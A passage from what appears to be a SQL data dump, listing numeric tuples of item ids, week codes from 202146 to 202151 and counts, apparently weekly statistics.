1,'202146',6),(1720,1,'202146',6),(1734,1,'202146',6),(1778,1,'202146',6),(1780,1,'202146',6),(2178,1,'202146',6),(2503,1,'202146',6),(3060,1,'202146',6),(3285,1,'202146',6),(4416,1,'202146',6),(472,1,'202146',7),(2809,1,'202146',7),(2813,1,'202146',7),(3030,1,'202146',7),(3045,1,'202146',7),(3430,1,'202146',7),(3710,1,'202146',7),(4238,1,'202146',7),(4341,1,'202146',7),(4400,1,'202146',7),(470,1,'202146',8),(1612,1,'202146',8),(3069,1,'202146',8),(3764,1,'202146',8),(4326,1,'202146',8),(1608,1,'202146',9),(3127,1,'202146',9),(89,1,'202146',10),(108,1,'202146',10),(1588,1,'202146',10),(4436,1,'202146',10),(2159,1,'202146',11),(87,1,'202146',12),(1582,1,'202146',12),(1604,1,'202146',13),(2457,1,'202146',13),(467,1,'202146',14),(1544,1,'202146',14),(1606,1,'202146',14),(76,1,'202146',15),(1594,1,'202146',15),(3005,1,'202146',15),(68,1,'202146',16),(4457,1,'202146',16),(1600,1,'202146',18),(1598,1,'202146',20),(1586,1,'202146',23),(2309,1,'202146',30),(72,1,'202146',34),(1602,1,'202146',36),(80,1,'202146',40),(2904,1,'202146',58),(9,1,'202146',880),(110,1,'202147',1),(1720,1,'202147',1),(1730,1,'202147',1),(1739,1,'202147',1),(1778,1,'202147',1),(1782,1,'202147',1),(2248,1,'202147',1),(2911,1,'202147',1),(2993,1,'202147',1),(3023,1,'202147',1),(3034,1,'202147',1),(3096,1,'202147',1),(3243,1,'202147',1),(3259,1,'202147',1),(3316,1,'202147',1),(3489,1,'202147',1),(3771,1,'202147',1),(3774,1,'202147',1),(4377,1,'202147',1),(4404,1,'202147',1),(106,1,'202147',2),(471,1,'202147',2),(477,1,'202147',2),(1722,1,'202147',2),(1734,1,'202147',2),(1737,1,'202147',2),(1745,1,'202147',2),(1749,1,'202147',2),(1751,1,'202147',2),(1766,1,'202147',2),(1768,1,'202147',2),(2161,1,'202147',2),(2252,1,'202147',2),(2751,1,'202147',2),(2989,1,'202147',2),(3083,1,'202147',2),(3097,1,'202147',2),(3107,1,'202147',2),(3240,1,'202147',2),(3253,1,'202147',2),(3261,1,'202147',2),(3290,1,'202147',2),(3297,1,'202147',2),(3313,1,'202147',2),(3479,1,'202147',2),(3731,1,'202147',2),(3735,1,'202147',2),(3752,1,'202147',2),(4329,1,'202147',2),(4387,1,'202147',2),(4391,1,'202147',2),(4396,1,'202147',2),(4408,1,'202147',2),(479,1,'202147',3),(480,1,'202147',3),(1614,1,'202147',3),(1695,1,'202147',3),(1715,1,'202147',3),(1724,1,'202147',3),(1728,1,'202147',3),(1732,1,'202147',3),(1741,1,'202147',3),(1743,1,'202147',3),(1770,1,'202147',3),(1776,1,'202147',3),(2150,1,'202147',3),(2152,1,'202147',3),(2178,1,'202147',3),(2293,1,'202147',3),(2296,1,'202147',3),(2801,1,'202147',3),(2956,1,'202147',3),(2964,1,'202147',3),(2965,1,'202147',3),(3004,1,'202147',3),(3038,1,'202147',3),(3066,1,'202147',3),(3069,1,'202147',3),(3092,1,'202147',3),(3104,1,'202147',3),(3249,1,'202147',3),(3257,1,'202147',3),(3265,1,'202147',3),(3275,1,'202147',3),(3278,1,'202147',3),(3287,1,'202147',3),(3486,1,'202147',3),(3498,1,'202147',3),(3541,1,'202147',3),(3721,1,'202147',3),(3727,1,'202147',3),(4301,1,'202147',3),(4357,1,'202147',3),(4373,1,'202147',3),(4382,1,'202147',3),(4424,1,'202147',3),(4428,1,'202147',3),(4448,1,'202147',3),(467,1,'202147',4),(481,1,'202147',4),(482,1,'202147',4),(1697,1,'202147',4),(1701,1,'202147',4),(1707,1,'202147',4),(1709,1,'202147',4),(1711,1,'202147',4),(1713,1,'202147',4),(1774,1,'202147',4),(2063,1,'202147',4),(2148,1,'202147',4),(2617,1,'202147',4),(2658,1,'202147',4),(2991,1,'202147',4),(3006,1,'202147',4),(3027,1,'202147',4),(3079,1,'202147',4),(3102,1,'202147',4),(3109,1,'202147',4),(3226,1,'202147',4),(3251,1,'202147',4),(3263,1,'202147',4),(3267,1,'202147',4),(3285,1,'202147',4),(3307,1,'202147',4),(3724,1,'202147',4),(3742,1,'202147',4),(3749,1,'202147',4),(4323,1,'202147',4),(4368,1,'202147',4),(4416,1,'202147',4),(4420,1,'202147',4),(4432,1,'202147',4),(4436,1,'202147',4),(4444,1,'202147',4),(102,1,'202147',5),(1584,1,'202147',5),(1703,1,'202147',5),(1718,1,'202147',5),(2154,1,'202147',5),(2156,1,'202147',5),(2297,1,'202147',5),(2704,1,'202147',5),(2748,1,'202147',5),(2775,1,'202147',5),(3041,1,'202147',5),(3090,1,'202147',5),(3124,1,'202147',5),(3269,1,'202147',5),(3271,1,'202147',5),(3273,1,'202147',5),(3280,1,'202147',5),(3282,1,'202147',5),(3482,1,'202147',5),(3534,1,'202147',5),(3714,1,'202147',5),(3746,1,'202147',5),(4275,1,'202147',5),(4412,1,'202147',5),(4440,1,'202147',5),(472,1,'202147',6),(476,1,'202147',6),(484,1,'202147',6),(485,1,'202147',6),(486,1,'202147',6),(488,1,'202147',6),(1590,1,'202147',6),(1592,1,'202147',6),(1596,1,'202147',6),(1610,1,'202147',6),(1726,1,'202147',6),(2558,1,'202147',6),(2769,1,'202147',6),(3045,1,'202147',6),(3117,1,'202147',6),(3245,1,'202147',6),(470,1,'202147',7),(474,1,'202147',7),(478,1,'202147',7),(483,1,'202147',7),(1588,1,'202147',7),(1699,1,'202147',7),(1772,1,'202147',7),(2809,1,'202147',7),(3087,1,'202147',7),(3777,1,'202147',7),(4363,1,'202147',7),(468,1,'202147',8),(570,1,'202147',8),(1544,1,'202147',8),(1604,1,'202147',8),(2165,1,'202147',8),(2609,1,'202147',8),(3063,1,'202147',8),(3531,1,'202147',8),(4332,1,'202147',8),(4338,1,'202147',8),(74,1,'202147',9),(473,1,'202147',9),(2813,1,'202147',9),(3060,1,'202147',9),(4400,1,'202147',9),(1598,1,'202147',10),(2159,1,'202147',10),(3005,1,'202147',10),(3127,1,'202147',10),(4238,1,'202147',10),(4341,1,'202147',10),(84,1,'202147',11),(469,1,'202147',11),(487,1,'202147',11),(1594,1,'202147',11),(1606,1,'202147',11),(3072,1,'202147',11),(4326,1,'202147',11),(4335,1,'202147',11),(335,1,'202147',12),(2503,1,'202147',12),(2804,1,'202147',12),(3030,1,'202147',13),(3764,1,'202147',13),(2457,1,'202147',14),(3710,1,'202147',14),(4454,1,'202147',14),(76,1,'202147',15),(1582,1,'202147',15),(1608,1,'202147',15),(1612,1,'202147',15),(87,1,'202147',17),(108,1,'202147',17),(4457,1,'202147',17),(72,1,'202147',18),(91,1,'202147',18),(89,1,'202147',21),(3781,1,'202147',21),(1602,1,'202147',25),(68,1,'202147',27),(1600,1,'202147',27),(2309,1,'202147',27),(1586,1,'202147',39),(80,1,'202147',54),(2904,1,'202147',81),(9,1,'202147',716),(1709,1,'202148',1),(1732,1,'202148',1),(1699,1,'202148',2),(1711,1,'202148',2),(1751,1,'202148',2),(1782,1,'202148',2),(2293,1,'202148',2),(3275,1,'202148',2),(481,1,'202148',3),(1584,1,'202148',3),(1701,1,'202148',3),(1743,1,'202148',3),(1745,1,'202148',3),(1776,1,'202148',3),(2152,1,'202148',3),(2296,1,'202148',3),(2558,1,'202148',3),(2991,1,'202148',3),(3004,1,'202148',3),(3090,1,'202148',3),(3104,1,'202148',3),(3269,1,'202148',3),(3280,1,'202148',3),(3727,1,'202148',3),(4387,1,'202148',3),(4424,1,'202148',3),(476,1,'202148',4),(480,1,'202148',4),(482,1,'202148',4),(1695,1,'202148',4),(1697,1,'202148',4),(1705,1,'202148',4),(1707,1,'202148',4),(1737,1,'202148',4),(1747,1,'202148',4),(1766,1,'202148',4),(1778,1,'202148',4),(2156,1,'202148',4),(2748,1,'202148',4),(2801,1,'202148',4),(2956,1,'202148',4),(2965,1,'202148',4),(3006,1,'202148',4),(3023,1,'202148',4),(3038,1,'202148',4),(3066,1,'202148',4),(3092,1,'202148',4),(3097,1,'202148',4),(3229,1,'202148',4),(3249,1,'202148',4),(3251,1,'202148',4),(3253,1,'202148',4),(3263,1,'202148',4),(3265,1,'202148',4),(3271,1,'202148',4),(3273,1,'202148',4),(3278,1,'202148',4),(3297,1,'202148',4),(3486,1,'202148',4),(3534,1,'202148',4),(3541,1,'202148',4),(3721,1,'202148',4),(3738,1,'202148',4),(4275,1,'202148',4),(4329,1,'202148',4),(4368,1,'202148',4),(4377,1,'202148',4),(4412,1,'202148',4),(4440,1,'202148',4),(4444,1,'202148',4),(102,1,'202148',5),(486,1,'202148',5),(1590,1,'202148',5),(1715,1,'202148',5),(1726,1,'202148',5),(1734,1,'202148',5),(1749,1,'202148',5),(1768,1,'202148',5),(1780,1,'202148',5),(2063,1,'202148',5),(2178,1,'202148',5),(2252,1,'202148',5),(2964,1,'202148',5),(2993,1,'202148',5),(3027,1,'202148',5),(3072,1,'202148',5),(3083,1,'202148',5),(3102,1,'202148',5),(3107,1,'202148',5),(3109,1,'202148',5),(3117,1,'202148',5),(3240,1,'202148',5),(3257,1,'202148',5),(3267,1,'202148',5),(3282,1,'202148',5),(3287,1,'202148',5),(3307,1,'202148',5),(3489,1,'202148',5),(3714,1,'202148',5),(3724,1,'202148',5),(3749,1,'202148',5),(3774,1,'202148',5),(4301,1,'202148',5),(4357,1,'202148',5),(4373,1,'202148',5),(4382,1,'202148',5),(4391,1,'202148',5),(4404,1,'202148',5),(4408,1,'202148',5),(4416,1,'202148',5),(4432,1,'202148',5),(4436,1,'202148',5),(474,1,'202148',6),(477,1,'202148',6),(483,1,'202148',6),(1604,1,'202148',6),(1718,1,'202148',6),(1720,1,'202148',6),(1724,1,'202148',6),(1741,1,'202148',6),(1770,1,'202148',6),(1772,1,'202148',6),(2150,1,'202148',6),(2154,1,'202148',6),(2161,1,'202148',6),(2617,1,'202148',6),(2769,1,'202148',6),(2804,1,'202148',6),(3041,1,'202148',6),(3060,1,'202148',6),(3124,1,'202148',6),(3259,1,'202148',6),(3261,1,'202148',6),(3430,1,'202148',6),(3438,1,'202148',6),(3479,1,'202148',6),(3482,1,'202148',6),(3731,1,'202148',6),(3735,1,'202148',6),(3771,1,'202148',6),(4341,1,'202148',6),(4420,1,'202148',6),(4428,1,'202148',6),(4448,1,'202148',6),(467,1,'202148',7),(473,1,'202148',7),(478,1,'202148',7),(488,1,'202148',7),(1592,1,'202148',7),(1596,1,'202148',7),(1614,1,'202148',7),(1713,1,'202148',7),(1728,1,'202148',7),(1774,1,'202148',7),(2148,1,'202148',7),(2658,1,'202148',7),(2751,1,'202148',7),(2813,1,'202148',7),(3087,1,'202148',7),(3127,1,'202148',7),(3226,1,'202148',7),(3243,1,'202148',7),(3285,1,'202148',7),(3316,1,'202148',7),(3498,1,'202148',7),(3531,1,'202148',7),(4323,1,'202148',7),(4326,1,'202148',7),(4338,1,'202148',7),(4363,1,'202148',7),(4396,1,'202148',7),(479,1,'202148',8),(484,1,'202148',8),(485,1,'202148',8),(1703,1,'202148',8),(1730,1,'202148',8),(1739,1,'202148',8),(2248,1,'202148',8),(2297,1,'202148',8),(2609,1,'202148',8),(2775,1,'202148',8),(3034,1,'202148',8),(3079,1,'202148',8),(3096,1,'202148',8),(3742,1,'202148',8),(3752,1,'202148',8),(470,1,'202148',9),(471,1,'202148',9),(487,1,'202148',9),(570,1,'202148',9),(1610,1,'202148',9),(1722,1,'202148',9),(2809,1,'202148',9),(2989,1,'202148',9),(3245,1,'202148',9),(3313,1,'202148',9),(3710,1,'202148',9),(84,1,'202148',10),(108,1,'202148',10),(469,1,'202148',10),(1582,1,'202148',10),(1588,1,'202148',10),(2165,1,'202148',10),(2704,1,'202148',10),(3030,1,'202148',10),(3045,1,'202148',10),(3063,1,'202148',10),(3069,1,'202148',10),(3247,1,'202148',10),(3777,1,'202148',10),(3781,1,'202148',10),(4335,1,'202148',10),(74,1,'202148',11),(87,1,'202148',11),(468,1,'202148',11),(3005,1,'202148',11),(1544,1,'202148',12),(1594,1,'202148',12),(2911,1,'202148',12),(3746,1,'202148',12),(4238,1,'202148',12),(4332,1,'202148',12),(335,1,'202148',13),(1608,1,'202148',13),(2457,1,'202148',13),(4400,1,'202148',13),(91,1,'202148',14),(472,1,'202148',14),(1598,1,'202148',14),(1606,1,'202148',14),(1612,1,'202148',14),(3290,1,'202148',14),(3764,1,'202148',14),(2503,1,'202148',15),(76,1,'202148',16),(4454,1,'202148',16),(2159,1,'202148',17),(89,1,'202148',18),(1600,1,'202148',18),(4457,1,'202148',22),(68,1,'202148',25),(72,1,'202148',28),(2309,1,'202148',32),(1586,1,'202148',33),(1602,1,'202148',34),(80,1,'202148',52),(2904,1,'202148',85),(9,1,'202148',687),(1718,1,'202149',1),(106,1,'202149',2),(1722,1,'202149',2),(1782,1,'202149',2),(2152,1,'202149',2),(1610,1,'202149',3),(1697,1,'202149',3),(1705,1,'202149',3),(1726,1,'202149',3),(1739,1,'202149',3),(2150,1,'202149',3),(2965,1,'202149',3),(2993,1,'202149',3),(3096,1,'202149',3),(3249,1,'202149',3),(3251,1,'202149',3),(3282,1,'202149',3),(3438,1,'202149',3),(3489,1,'202149',3),(3731,1,'202149',3),(471,1,'202149',4),(473,1,'202149',4),(488,1,'202149',4),(1584,1,'202149',4),(1707,1,'202149',4),(1709,1,'202149',4),(1734,1,'202149',4),(1741,1,'202149',4),(1772,1,'202149',4),(1774,1,'202149',4),(2063,1,'202149',4),(2148,1,'202149',4),(2252,1,'202149',4),(2293,1,'202149',4),(2989,1,'202149',4),(3034,1,'202149',4),(3041,1,'202149',4),(3102,1,'202149',4),(3104,1,'202149',4),(3124,1,'202149',4),(3253,1,'202149',4),(3265,1,'202149',4),(3269,1,'202149',4),(3287,1,'202149',4),(3498,1,'202149',4),(3541,1,'202149',4),(3710,1,'202149',4),(3714,1,'202149',4),(3727,1,'202149',4),(3735,1,'202149',4),(3749,1,'202149',4),(4357,1,'202149',4),(4404,1,'202149',4),(4416,1,'202149',4),(476,1,'202149',5),(479,1,'202149',5),(481,1,'202149',5),(482,1,'202149',5),(483,1,'202149',5),(1703,1,'202149',5),(1713,1,'202149',5),(1715,1,'202149',5),(1720,1,'202149',5),(1728,1,'202149',5),(1745,1,'202149',5),(1747,1,'202149',5),(1751,1,'202149',5),(1768,1,'202149',5),(1780,1,'202149',5),(2178,1,'202149',5),(2296,1,'202149',5),(2617,1,'202149',5),(2748,1,'202149',5),(3072,1,'202149',5),(3087,1,'202149',5),(3092,1,'202149',5),(3097,1,'202149',5),(3240,1,'202149',5),(3243,1,'202149',5),(3247,1,'202149',5),(3285,1,'202149',5),(3316,1,'202149',5),(3486,1,'202149',5),(3531,1,'202149',5),(3534,1,'202149',5),(3724,1,'202149',5),(4338,1,'202149',5),(4363,1,'202149',5),(4368,1,'202149',5),(4373,1,'202149',5),(4382,1,'202149',5),(4387,1,'202149',5),(4408,1,'202149',5),(4424,1,'202149',5),(4428,1,'202149',5),(4432,1,'202149',5),(102,1,'202149',6),(467,1,'202149',6),(478,1,'202149',6),(480,1,'202149',6),(1590,1,'202149',6),(1699,1,'202149',6),(1701,1,'202149',6),(1732,1,'202149',6),(1737,1,'202149',6),(1743,1,'202149',6),(1749,1,'202149',6),(1766,1,'202149',6),(2154,1,'202149',6),(2165,1,'202149',6),(2248,1,'202149',6),(2609,1,'202149',6),(2751,1,'202149',6),(2964,1,'202149',6),(2991,1,'202149',6),(3004,1,'202149',6),(3006,1,'202149',6),(3023,1,'202149',6),(3038,1,'202149',6),(3066,1,'202149',6),(3090,1,'202149',6),(3229,1,'202149',6),(3259,1,'202149',6),(3263,1,'202149',6),(3271,1,'202149',6),(3278,1,'202149',6),(3290,1,'202149',6),(3307,1,'202149',6),(3430,1,'202149',6),(3479,1,'202149',6),(3721,1,'202149',6),(3738,1,'202149',6),(3774,1,'202149',6),(4396,1,'202149',6),(4412,1,'202149',6),(4420,1,'202149',6),(4444,1,'202149',6),(4448,1,'202149',6),(470,1,'202149',7),(472,1,'202149',7),(485,1,'202149',7),(1592,1,'202149',7),(1612,1,'202149',7),(1695,1,'202149',7),(1724,1,'202149',7),(1730,1,'202149',7),(2911,1,'202149',7),(3027,1,'202149',7),(3083,1,'202149',7),(3107,1,'202149',7),(3226,1,'202149',7),(3257,1,'202149',7),(3267,1,'202149',7),(3297,1,'202149',7),(3313,1,'202149',7),(3742,1,'202149',7),(4275,1,'202149',7),(4301,1,'202149',7),(4326,1,'202149',7),(4329,1,'202149',7),(4436,1,'202149',7),(4440,1,'202149',7),(468,1,'202149',8),(474,1,'202149',8),(484,1,'202149',8),(486,1,'202149',8),(487,1,'202149',8),(2156,1,'202149',8),(2558,1,'202149',8),(2769,1,'202149',8),(2956,1,'202149',8),(3069,1,'202149',8),(3109,1,'202149',8),(3117,1,'202149',8),(3261,1,'202149',8),(3273,1,'202149',8),(3275,1,'202149',8),(3280,1,'202149',8),(3482,1,'202149',8),(3752,1,'202149',8),(3777,1,'202149',8),(4323,1,'202149',8),(4377,1,'202149',8),(74,1,'202149',9),(1596,1,'202149',9),(1604,1,'202149',9),(1770,1,'202149',9),(2161,1,'202149',9),(2775,1,'202149',9),(2804,1,'202149',9),(3045,1,'202149',9),(3127,1,'202149',9),(3245,1,'202149',9),(4238,1,'202149',9),(4341,1,'202149',9),(4400,1,'202149',9),(570,1,'202149',10),(1614,1,'202149',10),(1711,1,'202149',10),(1778,1,'202149',10),(2297,1,'202149',10),(3005,1,'202149',10),(3079,1,'202149',10),(3764,1,'202149',10),(4332,1,'202149',10),(4391,1,'202149',10),(477,1,'202149',11),(1598,1,'202149',11),(1776,1,'202149',11),(3030,1,'202149',11),(3060,1,'202149',11),(3063,1,'202149',11),(3781,1,'202149',11),(4335,1,'202149',11),(87,1,'202149',12),(469,1,'202149',12),(1588,1,'202149',12),(2801,1,'202149',12),(2813,1,'202149',12),(335,1,'202149',13),(2809,1,'202149',13),(3746,1,'202149',13),(4454,1,'202149',13),(108,1,'202149',14),(1544,1,'202149',14),(1582,1,'202149',14),(2457,1,'202149',14),(2658,1,'202149',14),(3771,1,'202149',14),(84,1,'202149',15),(91,1,'202149',15),(1608,1,'202149',16),(2704,1,'202149',16),(1606,1,'202149',17),(2159,1,'202149',17),(4457,1,'202149',17),(1600,1,'202149',20),(2503,1,'202149',21),(89,1,'202149',22),(1594,1,'202149',22),(76,1,'202149',26),(68,1,'202149',27),(72,1,'202149',27),(1586,1,'202149',30),(1602,1,'202149',33),(2309,1,'202149',45),(80,1,'202149',59),(2904,1,'202149',111),(9,1,'202149',760),(106,1,'202150',1),(110,1,'202150',1),(1703,1,'202150',2),(1734,1,'202150',2),(1737,1,'202150',2),(1747,1,'202150',2),(3229,1,'202150',2),(3240,1,'202150',2),(3245,1,'202150',2),(3247,1,'202150',2),(3249,1,'202150',2),(3721,1,'202150',2),(3738,1,'202150',2),(1695,1,'202150',3),(1701,1,'202150',3),(1711,1,'202150',3),(1720,1,'202150',3),(1726,1,'202150',3),(1730,1,'202150',3),(1741,1,'202150',3),(1745,1,'202150',3),(1751,1,'202150',3),(1768,1,'202150',3),(1774,1,'202150',3),(2148,1,'202150',3),(2156,1,'202150',3),(2161,1,'202150',3),(2248,1,'202150',3),(2252,1,'202150',3),(2775,1,'202150',3),(3027,1,'202150',3),(3034,1,'202150',3),(3038,1,'202150',3),(3092,1,'202150',3),(3096,1,'202150',3),(3226,1,'202150',3),(3243,1,'202150',3),(3259,1,'202150',3),(3263,1,'202150',3),(3265,1,'202150',3),(3269,1,'202150',3),(3271,1,'202150',3),(3278,1,'202150',3),(3479,1,'202150',3),(3541,1,'202150',3),(3714,1,'202150',3),(3727,1,'202150',3),(4275,1,'202150',3),(4332,1,'202150',3),(1697,1,'202150',4),(1707,1,'202150',4),(1715,1,'202150',4),(1722,1,'202150',4),(1724,1,'202150',4),(1732,1,'202150',4),(1780,1,'202150',4),(2154,1,'202150',4),(2293,1,'202150',4),(2296,1,'202150',4),(2558,1,'202150',4),(2748,1,'202150',4),(2965,1,'202150',4),(2993,1,'202150',4),(3066,1,'202150',4),(3104,1,'202150',4),(3124,1,'202150',4),(3280,1,'202150',4),(3290,1,'202150',4),(3316,1,'202150',4),(3534,1,'202150',4),(3731,1,'202150',4),(3749,1,'202150',4),(4357,1,'202150',4),(1610,1,'202150',5),(1699,1,'202150',5),(1705,1,'202150',5),(1713,1,'202150',5),(1718,1,'202150',5),(1739,1,'202150',5),(1743,1,'202150',5),(1749,1,'202150',5),(1772,1,'202150',5),(2063,1,'202150',5),(2152,1,'202150',5),(2165,1,'202150',5),(2178,1,'202150',5),(2751,1,'202150',5),(2809,1,'202150',5),(2911,1,'202150',5),(2964,1,'202150',5),(3004,1,'202150',5),(3030,1,'202150',5),(3072,1,'202150',5),(3107,1,'202150',5),(3109,1,'202150',5),(3251,1,'202150',5),(3261,1,'202150',5),(3267,1,'202150',5),(3273,1,'202150',5),(3287,1,'202150',5),(3297,1,'202150',5),(3307,1,'202150',5),(3430,1,'202150',5),(3724,1,'202150',5),(3752,1,'202150',5),(3771,1,'202150',5),(1592,1,'202150',6),(1709,1,'202150',6),(1776,1,'202150',6),(1782,1,'202150',6),(2159,1,'202150',6),(2801,1,'202150',6),(2991,1,'202150',6),(3005,1,'202150',6),(3023,1,'202150',6),(3079,1,'202150',6),(3090,1,'202150',6),(3097,1,'202150',6),(3257,1,'202150',6),(3282,1,'202150',6),(4329,1,'202150',6),(4387,1,'202150',6),(4408,1,'202150',6),(4424,1,'202150',6),(4432,1,'202150',6),(102,1,'202150',7),(483,1,'202150',7),(570,1,'202150',7),(1728,1,'202150',7),(1778,1,'202150',7),(2150,1,'202150',7),(2297,1,'202150',7),(3006,1,'202150',7),(3041,1,'202150',7),(3060,1,'202150',7),(3069,1,'202150',7),(3102,1,'202150',7),(3117,1,'202150',7),(3275,1,'202150',7),(3285,1,'202150',7),(3486,1,'202150',7),(3774,1,'202150',7),(3777,1,'202150',7),(4301,1,'202150',7),(4335,1,'202150',7),(4404,1,'202150',7),(4428,1,'202150',7),(4436,1,'202150',7),(4448,1,'202150',7),(484,1,'202150',8),(2609,1,'202150',8),(2617,1,'202150',8),(3087,1,'202150',8),(3498,1,'202150',8),(3742,1,'202150',8),(471,1,'202150',9),(485,1,'202150',9),(1590,1,'202150',9),(1596,1,'202150',9),(1770,1,'202150',9),(2956,1,'202150',9),(3253,1,'202150',9),(3313,1,'202150',9),(3482,1,'202150',9),(3489,1,'202150',9),(3735,1,'202150',9),(4338,1,'202150',9),(4377,1,'202150',9),(4440,1,'202150',9),(480,1,'202150',10),(481,1,'202150',10),(1604,1,'202150',10),(2989,1,'202150',10),(3063,1,'202150',10),(4238,1,'202150',10),(4373,1,'202150',10),(4382,1,'202150',10),(4420,1,'202150',10),(467,1,'202150',11),(474,1,'202150',11),(476,1,'202150',11),(477,1,'202150',11),(479,1,'202150',11),(4363,1,'202150',11),(4391,1,'202150',11),(4396,1,'202150',11),(4416,1,'202150',11),(4444,1,'202150',11),(473,1,'202150',12),(487,1,'202150',12),(488,1,'202150',12),(1766,1,'202150',12),(2658,1,'202150',12),(2804,1,'202150',12),(3746,1,'202150',12),(4323,1,'202150',12),(4326,1,'202150',12),(4368,1,'202150',12),(4454,1,'202150',12),(468,1,'202150',13),(470,1,'202150',13),(478,1,'202150',13),(482,1,'202150',13),(486,1,'202150',13),(1612,1,'202150',13),(2813,1,'202150',13),(3083,1,'202150',13),(4341,1,'202150',13),(4412,1,'202150',13),(74,1,'202150',14),(472,1,'202150',14),(1588,1,'202150',14),(2704,1,'202150',14),(2769,1,'202150',14),(3045,1,'202150',14),(3531,1,'202150',14),(3710,1,'202150',14),(1584,1,'202150',15),(1614,1,'202150',15),(3438,1,'202150',15),(84,1,'202150',16),(335,1,'202150',16),(1598,1,'202150',16),(4524,1,'202150',16),(1544,1,'202150',17),(2309,1,'202150',18),(3781,1,'202150',18),(4400,1,'202150',18),(469,1,'202150',19),(1608,1,'202150',19),(2457,1,'202150',19),(3127,1,'202150',19),(4514,1,'202150',19),(4517,1,'202150',19),(4529,1,'202150',19),(3764,1,'202150',20),(4520,1,'202150',21),(1600,1,'202150',22),(76,1,'202150',23),(1594,1,'202150',23),(1582,1,'202150',24),(91,1,'202150',25),(108,1,'202150',25),(2503,1,'202150',26),(1606,1,'202150',27),(4457,1,'202150',27),(72,1,'202150',31),(89,1,'202150',31),(1586,1,'202150',35),(87,1,'202150',42),(1602,1,'202150',46),(80,1,'202150',47),(68,1,'202150',48),(2904,1,'202150',128),(9,1,'202150',639),(106,1,'202151',1),(1730,1,'202151',1),(2152,1,'202151',1),(2993,1,'202151',1),(3109,1,'202151',1),(3261,1,'202151',1),(3263,1,'202151',1),(1705,1,'202151',2),(1711,1,'202151',2),(1713,1,'202151',2),(1715,1,'202151',2),(1726,1,'202151',2),(1739,1,'202151',2),(1741,1,'202151',2),(1745,1,'202151',2),(1751,1,'202151',2),(1766,1,'202151',2),(1776,1,'202151',2),(1778,1,'202151',2),(1780,1,'202151',2),(2063,1,'202151',2),(2150,1,'202151',2),(2154,1,'202151',2),(2293,1,'202151',2),(3034,1,'202151',2),(3102,1,'202151',2),(3229,1,'202151',2),(3247,1,'202151',2),(3259,1,'202151',2),(3273,1,'202151',2),(3280,1,'202151',2),(3282,1,'202151',2),(102,1,'202151',3),(476,1,'202151',3),(1701,1,'202151',3),(1722,1,'202151',3),(1737,1,'202151',3),(1747,1,'202151',3),(1770,1,'202151',3),(1772,1,'202151',3),(1774,1,'202151',3),(2252,1,'202151',3),(2296,1,'202151',3),(3097,1,'202151',3),(3104,1,'202151',3),(3107,1,'202151',3),(3271,1,'202151',3),(3275,1,'202151',3),(3285,1,'202151',3),(3541,1,'202151',3),(3777,1,'202151',3),(4377,1,'202151',3),(4408,1,'202151',3),(4440,1,'202151',3),(471,1,'202151',4),(478,1,'202151',4),(481,1,'202151',4),(483,1,'202151',4),(484,1,'202151',4),(1695,1,'202151',4),(1697,1,'202151',4),(1699,1,'202151',4),(1718,1,'202151',4),(1720,1,'202151',4),(1734,1,'202151',4),(1743,1,'202151',4),(1782,1,'202151',4),(2148,1,'202151',4),(2156,1,'202151',4),(2609,1,'202151',4),(2751,1,'202151',4),(3079,1,'202151',4),(3096,1,'202151',4),(3226,1,'202151',4),(3240,1,'202151',4),(3251,1,'202151',4),(3253,1,'202151',4),(3257,1,'202151',4),(3269,1,'202151',4),(3278,1,'202151',4),(3297,1,'202151',4),(3316,1,'202151',4),(3486,1,'202151',4),(3489,1,'202151',4),(3534,1,'202151',4),(3714,1,'202151',4),(3724,1,'202151',4),(3735,1,'202151',4),(4323,1,'202151',4),(4368,1,'202151',4),(4382,1,'202151',4),(4396,1,'202151',4),(4412,1,'202151',4),(4428,1,'202151',4),(4444,1,'202151',4),(480,1,'202151',5),(570,1,'202151',5),(1596,1,'202151',5),(1703,1,'202151',5),(1707,1,'202151',5),(1709,1,'202151',5),(1728,1,'202151',5),(1768,1,'202151',5),(2161,1,'202151',5),(2165,1,'202151',5),(2178,1,'202151',5),(2297,1,'202151',5),(2617,1,'202151',5),(2748,1,'202151',5),(2804,1,'202151',5),(2991,1,'202151',5),(3030,1,'202151',5),(3041,1,'202151',5),(3066,1,'202151',5),(3243,1,'202151',5),(3249,1,'202151',5),(3287,1,'202151',5),(3313,1,'202151',5),(3438,1,'202151',5),(3482,1,'202151',5),(3727,1,'202151',5),(3738,1,'202151',5),(3749,1,'202151',5),(3774,1,'202151',5),(4301,1,'202151',5),(4329,1,'202151',5),(4363,1,'202151',5),(4373,1,'202151',5),(4416,1,'202151',5),(4436,1,'202151',5),(468,1,'202151',6),(479,1,'202151',6),(486,1,'202151',6),(488,1,'202151',6),(1588,1,'202151',6),(1590,1,'202151',6),(1732,1,'202151',6),(2248,1,'202151',6),(2558,1,'202151',6),(2769,1,'202151',6),(2911,1,'202151',6),(2964,1,'202151',6),(2965,1,'202151',6),(2989,1,'202151',6),(3004,1,'202151',6),(3006,1,'202151',6),(3038,1,'202151',6),(3265,1,'202151',6),(3267,1,'202151',6),(3307,1,'202151',6),(3498,1,'202151',6),(3721,1,'202151',6),(4275,1,'202151',6),(4357,1,'202151',6),(4387,1,'202151',6),(4404,1,'202151',6),(4420,1,'202151',6),(4432,1,'202151',6),(474,1,'202151',7),(485,1,'202151',7),(1604,1,'202151',7),(1749,1,'202151',7),(2801,1,'202151',7),(2956,1,'202151',7),(3090,1,'202151',7),(3245,1,'202151',7),(3290,1,'202151',7),(3731,1,'202151',7),(4338,1,'202151',7),(4454,1,'202151',7),(477,1,'202151',8),(482,1,'202151',8),(487,1,'202151',8),(1592,1,'202151',8),(2159,1,'202151',8),(2704,1,'202151',8),(2809,1,'202151',8),(3005,1,'202151',8),(3023,1,'202151',8),(3083,1,'202151',8),(3087,1,'202151',8),(3092,1,'202151',8),(3124,1,'202151',8),(3430,1,'202151',8),(3746,1,'202151',8),(4335,1,'202151',8),(4391,1,'202151',8),(469,1,'202151',9),(1610,1,'202151',9),(2658,1,'202151',9),(3060,1,'202151',9),(3063,1,'202151',9),(3072,1,'202151',9),(3479,1,'202151',9),(3710,1,'202151',9),(4341,1,'202151',9),(4424,1,'202151',9),(4448,1,'202151',9),(4457,1,'202151',9),(4514,1,'202151',9),(4517,1,'202151',9),(1582,1,'202151',10),(1584,1,'202151',10),(1614,1,'202151',10),(3027,1,'202151',10),(3045,1,'202151',10),(3752,1,'202151',10),(3771,1,'202151',10),(335,1,'202151',11),(472,1,'202151',11),(1608,1,'202151',11),(2775,1,'202151',11),(3742,1,'202151',11),(4520,1,'202151',11),(84,1,'202151',12),(470,1,'202151',12),(3531,1,'202151',12),(4332,1,'202151',12),(467,1